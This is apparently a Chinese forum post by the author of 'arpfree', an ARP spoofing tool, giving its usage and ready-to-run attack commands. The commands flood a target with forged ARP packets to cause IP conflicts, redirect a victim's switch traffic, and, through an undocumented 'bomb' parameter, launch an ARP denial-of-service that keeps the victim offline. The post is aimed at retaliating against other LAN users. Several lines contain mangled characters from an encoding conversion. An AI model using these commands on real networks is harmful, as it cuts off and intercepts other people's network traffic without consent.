開始忘記說了，要使用ARP欺騙，必須啟動ip路由功能，修改(添加)注冊表選項：
　　 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
下面的朋友發(fā)現(xiàn)打開網(wǎng)卡失敗，原因可能就是這個.

發(fā)送的時候可以選擇ARP的TYPE。如果是ARP請求報文，則只要輸入要問的IP地址

如果是ARP應(yīng)答報文則要輸入發(fā)送端的IP以及對方詢問MAC地址對應(yīng)的IP地址

最后的發(fā)送速度可選參數(shù)為：（大小寫敏感..我覺得挺不好的）

fast----------最快
hear---------每60MS一個包（可能是比較適合結(jié)合SNIFFER做監(jiān)聽）
slowhear---每500MS一個包
auto---------每1秒一個包
slow---------每2秒個包

使用方法如下：

***********************************************************************
* (1)Send arp packet in "request mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
* | | | | |
* your mac address | | | |
* destnation mac | | speed
* arp type |
* |
* your ip address
***********************************************************************
* (2)Send arp packet in "reply mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
* | | | | | |
* your mac address | | | | |
* destnation mac | | | speed
* arp type | |
* | |
* your ip address |
* |
* the ip address of destnation mac
***********************************************************************

補(bǔ)充：反擊“LAN終結(jié)者”的辦法：

反擊“終結(jié)者”有幾個辦法：
1：發(fā)動比他更強(qiáng)烈的攻擊：
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
|
|
這里是你想攻擊的人的IP地址
2：交換機(jī)競爭：

arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
|
|
這里是你想攻擊的人的MAC地址

1:情況將導(dǎo)致他IP地址沖突（比“終結(jié)者”來的猛烈多了）

2：情況將使得他無法連接網(wǎng)絡(luò)（由于交換機(jī)把他的流量都給你了）
———————————更-----新----消-----息—————————————————————

因為有朋友反映在非交換環(huán)境下，如使用HUB的情況下，無法對目標(biāo)進(jìn)行打擊

故于2006年4月5日更新附件“arpfree.rar”

增加參數(shù)“bomb”，使用方法如下：

假設(shè)，目標(biāo)為IP：192.168.237.109 目標(biāo)mac為：011a8575a436

攻擊命令如下：

arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb

其實就是進(jìn)行簡單的ARP DOS攻擊，快速刷新目標(biāo)的ARP緩存，可以在消耗自身較少系統(tǒng)資源的情況下

造成和PDOS工具類似的效果，并且如果你不停止攻擊，對方重啟以后也無法正常進(jìn)入系統(tǒng)

（當(dāng)然前提是他沒拔網(wǎng)線）。

其實這樣做是十分不厚道的....所以參數(shù)就沒有寫在程序的 HELP 里面，大家慎用...